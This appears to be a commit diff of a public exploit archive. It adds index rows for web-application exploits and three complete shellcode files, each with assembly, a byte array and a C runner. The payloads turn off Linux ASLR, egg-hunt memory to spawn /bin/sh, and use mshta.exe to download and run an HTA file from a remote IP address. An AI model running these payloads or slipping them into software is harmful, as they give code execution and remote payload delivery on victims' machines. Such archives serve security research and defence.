48693,exploits/multiple/webapps/48693.go,"INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution",2020-07-26,"Patrick Hener",webapps,multiple,
48694,exploits/hardware/webapps/48694.txt,"UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)",2020-07-26,LiquidWorm,webapps,hardware,
48698,exploits/php/webapps/48698.txt,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download",2020-07-26,KBA@SOGETI_ESEC,webapps,php,
48699,exploits/php/webapps/48699.sh,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)",2020-07-26,KBA@SOGETI_ESEC,webapps,php,
48701,exploits/multiple/webapps/48701.txt,"Bludit 3.9.2 - Directory Traversal",2020-07-26,"James Green",webapps,multiple,
48702,exploits/php/webapps/48702.txt,"LibreHealth 2.0.0 - Authenticated Remote Code Execution",2020-07-26,boku,webapps,php,
48704,exploits/php/webapps/48704.py,"Online Course Registration 1.0 - Unauthenticated Remote Code Execution",2020-07-26,boku,webapps,php,
48705,exploits/php/webapps/48705.txt,"elaniin CMS - Authentication Bypass",2020-07-26,BKpatron,webapps,php,
48706,exploits/php/webapps/48706.txt,"Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)",2020-07-26,V1n1v131r4,webapps,php,
48707,exploits/php/webapps/48707.txt,"PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting",2020-07-26,AppleBois,webapps,php,
48708,exploits/multiple/webapps/48708.txt,"Bio Star 2.8.2 - Local File Inclusion",2020-07-26,"SITE Team",webapps,multiple,
48709,exploits/php/webapps/48709.txt,"Webtareas 2.1p - Arbitrary File Upload (Authenticated)",2020-07-26,AppleBois,webapps,php,
48711,exploits/hardware/webapps/48711.py,"F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion",2020-07-26,"Carlos E. Vieira",webapps,hardware,
48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,
48713,exploits/multiple/webapps/48713.txt,"Socket.io-file 2.0.31 - Arbitrary File Upload",2020-07-26,Cr0wTom,webapps,multiple,
48714,exploits/php/webapps/48714.txt,"pfSense 2.4.4-p3 - Cross-Site Request Forgery",2020-07-26,ghost_fh,webapps,php,
48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting",2020-07-26,"Peter Blue",webapps,php,
48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby,

Can't render this file because it is too large.

3
files_shellcodes.csv
View file

@ -1024,3 +1024,6 @@ id,file,description,date,author,type,platform
48379,shellcodes/linux/48379.c,"Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux
48585,shellcodes/arm/48585.c,"Linux/ARM - execve /bin/dash Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
48586,shellcodes/arm/48586.c,"Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
48592,shellcodes/linux_x86/48592.c,"Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86
48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",2020-07-26,danf42,shellcode,linux_x86
48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download using mshta.exe Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86

1 id file description date author type platform
1024 48379 shellcodes/linux/48379.c Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes) 2020-04-24 boku shellcode linux
1025 48585 shellcodes/arm/48585.c Linux/ARM - execve /bin/dash Shellcode (32 bytes) 2020-06-15 Anurag Srivastava shellcode arm
1026 48586 shellcodes/arm/48586.c Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes) 2020-06-15 Anurag Srivastava shellcode arm
1027 48592 shellcodes/linux_x86/48592.c Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes) 2020-06-17 Xenofon Vassilakopoulos shellcode linux_x86
1028 48703 shellcodes/linux_x86/48703.c Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes) 2020-07-26 danf42 shellcode linux_x86
1029 48718 shellcodes/windows_x86/48718.c Windows/x86 - Download using mshta.exe Shellcode (100 bytes) 2020-07-26 Siddharth Sharma shellcode windows_x86

79
shellcodes/linux_x86/48592.c Normal file
View file

@ -0,0 +1,79 @@
# Title: Linux/x86 - ASLR deactivation polymorphic shellcode ( 124 bytes )
# Author: Xenofon Vassilakopoulos
# Date: 2020-06-11
# Tested on: Linux 3.13.0-32-generic #57~precise1-Ubuntu i686 i386 GNU/Linux
# Architecture: i686 GNU/Linux
# Shellcode Length: 124 bytes
# Original shellcode: http://shell-storm.org/shellcode/files/shellcode-813.php
# SLAE-ID: SLAE - 1314
# Description: polymorphic version of ASLR deactivation shellcode
------------------ ASLR deactivation ------------------
global _start
section .text
_start:
xor ebx,ebx
mul ebx
mov DWORD [esp-0x4],eax
mov DWORD [esp-0x8],0x65636170
mov DWORD [esp-0xc],0x735f6176
mov DWORD [esp-0x10],0x5f657a69
mov DWORD [esp-0x14],0x6d6f646e
mov DWORD [esp-0x18],0x61722f6c
mov DWORD [esp-0x1c],0x656e7265
mov DWORD [esp-0x20],0x6b2f7379
mov DWORD [esp-0x24],0x732f636f
mov DWORD [esp-0x28],0x72702f2f
sub esp,0x28
mov ebx,esp
mov cx,0x301
mov dx,0x2a1
add dx,0x1b
mov al, 0x5
int 0x80
mov ebx,eax
push ebx
mov cx,0x3b30
push cx
mov ecx,esp
shr edx, 16
inc edx
mov al,0x4
int 0x80
mov al,0x1
int 0x80
------------------ shellcode ------------------
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x31\xdb\xf7\xe3\x89\x44\x24\xfc\xc7"
"\x44\x24\xf8\x70\x61\x63\x65\xc7\x44"
"\x24\xf4\x76\x61\x5f\x73\xc7\x44\x24"
"\xf0\x69\x7a\x65\x5f\xc7\x44\x24\xec"
"\x6e\x64\x6f\x6d\xc7\x44\x24\xe8\x6c"
"\x2f\x72\x61\xc7\x44\x24\xe4\x65\x72"
"\x6e\x65\xc7\x44\x24\xe0\x79\x73\x2f"
"\x6b\xc7\x44\x24\xdc\x6f\x63\x2f\x73"
"\xc7\x44\x24\xd8\x2f\x2f\x70\x72\x83"
"\xec\x28\x89\xe3\x66\xb9\x01\x03\x66"
"\xba\xa1\x02\x66\x83\xc2\x1b\xb0\x05"
"\xcd\x80\x89\xc3\x53\x66\xb9\x30\x3b"
"\x66\x51\x89\xe1\xc1\xea\x10\x42\xb0"
"\x04\xcd\x80\xb0\x01\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

75
shellcodes/linux_x86/48703.c Normal file
View file

@ -0,0 +1,75 @@
# Exploit Title: Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)
# Author: danf42
# Date: 2020-07-16
# Platform: Linux/x86
/*******************************************************************************
sigaction(2) approach to egghunting as described in the paper
"Safely Searching Process Virtual Address Space" by skape
The shellcode prepares the registers to start the hunting by clearing the
direction flag and setting eax, ecx, and edx to 0
Egg value is 0x50905090
global _start
section .text
_start:
cld ; clear the direction flag
xor ecx, ecx ; clear ecx
mul ecx ; multiply by ecx, zero out eax and edx
IncPage:
or cx, 0xfff ; Align page address
IncAddr:
inc ecx ; Go to next address
push byte 0x43 ; syscall for sigaction()
pop eax ; Put syscall value into EAX
int 0x80 ; call sigaction() to check memory location [ECX]
cmp al, 0xf2 ; Did it return EFAULT, Bad Address
jz IncPage ; Skip page if it returned EFAULT
mov eax, 0x50905090 ; Store EGG in EAX
mov edi, ecx ; Move ECX to EDI for scasd operation
scasd ; Check if [EDI] == EAX then increment EDI
jnz IncAddr ; Increment address if no match
scasd ; Check if [EDI] == EAX then increment EDI
jnz IncAddr ; Increment address if no match
jmp edi ; Jump to EDI (our shellcode) if both eggs are found
POC Shellcode to execute /bin/sh
xor ecx, ecx ; clear ecx
mul ecx ; mutliply eax by 0
push eax ; push eax onto stack
push 0x68732f2f ; push ASCII sh// onto stack
push 0x6e69622f ; push ASCII nib/ onto stack
mov ebx, esp ; push /bin/sh into ebx
mov al, 0xb ; mov 11 into lower byte of eax
int 0x80 ; execute execve syscall
mov al,0x01 ; move 1 into lower byte of each
xor ebx,ebx ; clear ebx
int 0x80 ; execute exit syscall
To Cmpile:
gcc sigaction_egghunter.c -fno-stack-protector -z execstack -o sigaction_egghunter
*******************************************************************************/
#include<stdio.h>
#include<string.h>
unsigned char egghunter[] = "\xfc\x31\xc9\xf7\xe1\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x90\x50\x90\x50\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";
unsigned char shellcode[] = "\x90\x50\x90\x50\x90\x50\x90\x50\x31\xc9\xf7\xe1\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xcd\x80";
void main()
{
printf("Egghunter Length: %d\n", strlen(egghunter));
printf("Shellcode Length: %d\n", strlen(shellcode));
int (*ret)() = (int(*)())egghunter;
ret();
}

69
shellcodes/windows_x86/48718.c Normal file
View file

@ -0,0 +1,69 @@
# Shellcode Title: Windows/x86 Download using mshta.exe Shellcode (100 bytes)
# Shellcode Author: Siddharth Sharma
# Shellcode Length: ~100 bytes
# Tested on: WIN7x86
# Date: 2020-06-16
/*
#Description
# Simply, instead of using mshta.exe to download file as:
mshta.exe http://<IP>:<port>/<file_name.hta> ,
# We could use below shellcode that does the same.
=============================
xor eax, eax ;clear eax,get msvcrt.dll
mov ax, 0x7472 ;"tr\0\0"
push eax
push dword 0x6376736d ;cvsm
push esp
mov ebx,0x77e3395c ;call LoadLibraryA
call ebx
mov ebp,eax ;msvcrt.dll is saved in ebp
;mshta.exe http://192.168.43.192:8080/9MKWaRO.hta
xor eax,eax
PUSH eax
PUSH 0x6174682e ;".hta"
PUSH 0x4f526157 ;"WaRO"
PUSH 0x4b4d392f ;"/9MK"
PUSH 0x38303830 ;"8080"
PUSH 0x3a323931 ;"192:"
PUSH 0x2e33342e ;".43."
PUSH 0x3836312e ;".168"
PUSH 0x3239312f ;"/192"
PUSH 0x2f3a7074 ;"tp:/"
PUSH 0x74682065 ;"e ht"
PUSH 0x78652e61 ;"a.ex"
PUSH 0x7468736d ;"msht"
MOV EDI,ESP ;adding a pointer to the stack
PUSH EDI
Mov eax,0x6ffab16f ;call System
call eax
xor eax, eax
push eax
mov eax, 0x77e3214f ;call ExitProcess
call eax
=====================================
*/
char code[] = "\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x5c\x39\xe3\x77\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x68\x74\x61\x68\x57\x61\x52\x4f\x68\x2f\x39\x4d\x4b\x68\x30\x38\x30\x38\x68\x31\x39\x32\x3a\x68\x2e\x34\x33\x2e\x68\x2e\x31\x36\x38\x68\x2f\x31\x39\x32\x68\x74\x70\x3a\x2f\x68\x65\x20\x68\x74\x68\x61\x2e\x65\x78\x68\x6d\x73\x68\x74\x89\xe7\x57\xb8\x6f\xb1\xfa\x6f\xff\xd0\x31\xc0\x50\xb8\x4f\x21\xe3\x77\xff\xd0";
int main(int argc, char **argv)
{
int(*func)();
func = (int(*)()) code;
(int)(*func)();
}